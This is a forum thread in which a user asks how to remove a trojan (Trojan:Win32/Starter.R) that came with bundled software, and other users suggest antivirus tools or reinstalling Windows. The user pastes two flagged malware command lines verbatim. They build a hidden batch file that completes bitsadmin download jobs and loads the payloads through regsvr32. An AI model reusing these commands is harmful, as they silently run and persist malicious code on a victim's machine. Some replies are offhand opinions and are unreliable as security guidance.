题主悬赏了80铜    |    已采纳 youngsheep12 的答案

电脑杀毒问题

微博   微信 2018-08-20 11:19     12个回答 其他
上个月我刚给笔记本加了块860evo当系统盘,重装完系统后装软件的时候中,也没注意,不小心被捆绑安装了一个叫one system care的软件,不过因为不经常开机我也懒得理。这几天我卸载了这个软件,但还是天天报毒。。很久都没用过什么杀毒软件了,麻烦大家支个招
报毒类型都是Trojan:Win32/Starter.R,一天3次。
受影响项目有2个:1.CmdLine: \Device\HarddiskVolume5\Windows\System32\cmd.exe "cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\067229ba-0513-1\x.bat" & echo bitsadmin /complete 067229ba-0513-1 ^> nul >> "C:\ProgramData\067229ba-0513-1\x.bat" & echo bitsadmin /cancel 067229ba-0513-1 ^> nul >> "C:\ProgramData\067229ba-0513-1\x.bat" & echo if exist "C:\ProgramData\067229ba-0513-1\067229ba-0513-1.d" goto q >> "C:\ProgramData\067229ba-0513-1\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\067229ba-0513-1\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"!=4c05f523067229ba " "C:\ProgramData\067229ba-0513-1\%i" >> "C:\ProgramData\067229ba-0513-1\x.bat")) > nul & echo :q >> "C:\ProgramData\067229ba-0513-1\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"!=4c05f523067229ba " "C:\ProgramData\067229ba-0513-1\067229ba-0513-1.d" >> "C:\ProgramData\067229ba-0513-1\x.bat" & echo del "C:\ProgramData\067229ba-0513-1\x.bat" ^& exit >> "C:\ProgramData\067229ba-0513-1\x.bat" & "C:\ProgramData\067229ba-0513-1\x.bat""
2.CmdLine: \Device\HarddiskVolume5\Windows\System32\cmd.exe "cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\067229ba-4965-0\x.bat" & echo bitsadmin /complete 067229ba-4965-0 ^> nul >> "C:\ProgramData\067229ba-4965-0\x.bat" & echo bitsadmin /cancel 067229ba-4965-0 ^> nul >> "C:\ProgramData\067229ba-4965-0\x.bat" & echo if exist "C:\ProgramData\067229ba-4965-0\067229ba-4965-0.d" goto q >> "C:\ProgramData\067229ba-4965-0\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\067229ba-4965-0\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"!=4c05f523067229ba " "C:\ProgramData\067229ba-4965-0\%i" >> "C:\ProgramData\067229ba-4965-0\x.bat")) > nul & echo :q >> "C:\ProgramData\067229ba-4965-0\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"!=4c05f523067229ba " "C:\ProgramData\067229ba-4965-0\067229ba-4965-0.d" >> "C:\ProgramData\067229ba-4965-0\x.bat" & echo del "C:\ProgramData\067229ba-4965-0\x.bat" ^& exit >> "C:\ProgramData\067229ba-4965-0\x.bat" & "C:\ProgramData\067229ba-4965-0\x.bat""
回答
  • aaztms
    360急救箱可以试一下
    不行重装
    2018-08-20 11:46
  • zyt133123132
    看360有描述是挖矿木马
    Win10自己杀不掉的话,只能考虑流氓360和重装电脑了吧
    2018-08-20 11:48
  • ykaw27
    重装电脑吧.最轻松简单的办法
    2018-08-20 12:35
  • ioioioio6123
    格了重装,多过瘾
    2018-08-20 12:35
  • 本条答案已被采纳 youngsheep12
    推荐使用卡巴斯基,毛子出品战斗力一流
    2018-08-20 12:37
  • futexlocker
    其实也没啥大危害

    启动项没删干净,单独下个360急救箱试一下,实在介意可以重装
    2018-08-20 14:58
  • bigfacelion
    卡巴斯基、McAfee这些老牌杀软不行了,对win10兼容非常不友好。现在杀毒软件论综合实力,没有比360更强的。
    2018-08-20 17:42
  • salvere017
    C:\ProgramData\067229ba-0513-1\x.bat
    C:\ProgramData\067229ba-4965-0\x.bat
    两个自启动batch?
    试试看开安全模式删掉,不行你就重装试试呗
    2018-08-20 17:47
  • oz-bezalius
    报毒的是哪个程序,可能有误报的问题
    2018-08-20 20:27
  • fanhaozheng221
    火绒安全软件个人版,小而全
    2018-08-20 22:17
  • norther_wind
    火绒+卡巴免费版,一般够了,这种互相关联的常驻后台,一般只能重装
    2018-08-20 22:36
  • cobray-gxy888
    没人吐槽一下 楼主发的这段代码里 @echo 这个兄弟的头像吗?简直和病毒太相配了
    2018-08-20 22:47
发表评论,请先 登录

T